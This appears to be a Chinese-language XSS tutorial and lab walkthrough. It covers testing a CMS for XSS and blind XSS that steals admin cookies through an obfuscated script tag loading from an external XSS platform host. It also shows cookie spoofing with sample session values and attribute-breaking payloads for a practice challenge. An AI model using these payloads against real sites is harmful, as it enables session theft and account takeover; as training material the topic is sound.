目录
1. XSS 盲打
1) 挖掘cms 网站XSS 漏洞
XSS漏洞验证
<script>alert(/xss/);</script> //显示警示框
<script>confirm(/xss/);</script> //显示确认框
<script>confirm('xss');</script>
<script>prompt('xss');</script> //显示提示框
//<script> 元素来注入恶意脚本
如果页面弹窗,浏览器把用户提交的字符串当做JS 来执行,执行成功,说明XSS 漏洞存在。
2) 利用XSS 平台盲打网站后台管理员Cookie
-
由于XXS 触发需要浏览器客户端用户(受害者)参与,攻击者不清楚何时何地会触发漏洞,这个过程一般被成为XSS 盲打。
<sCRiPt sRC=//xss.pt/m03VUL></sCrIpT>
XSS平台 - (支持http/https)XSS Platform
username=admin;
userid=1; “PHPSESSID=na4d9ft826joec4bfdd915o3q6”;
3) Cookie 欺骗
document.cookie = 'username=admin';
document.cookie = 'userid=1';
document.cookie = 'PHPSESSID=na4d9ft826joec4bfdd915o3q6';
2. XSS 挑战靶场练习
第一关:
http://192.168.5.140/xsschallenge/level1.php?name=<script>alert(/xss/);</script>
第二关:
试试<script>alert(/xss/)</script>
,发现输入的内容会被直接显示在页面中,这说明这段JS代码没有起作用,只是当作纯字符给输出到页面了。 右键页面查看源码:
发现尖括号都被转义成<和>
把input标签用">
闭合
"><script>alert(/xss/)</script>
第三关:
单引号闭合标签+html事件
'onmouseover='alert(/xss/)'
第四关:
双引号闭合标签+html事件
"onmouseover='alert(/xss/)'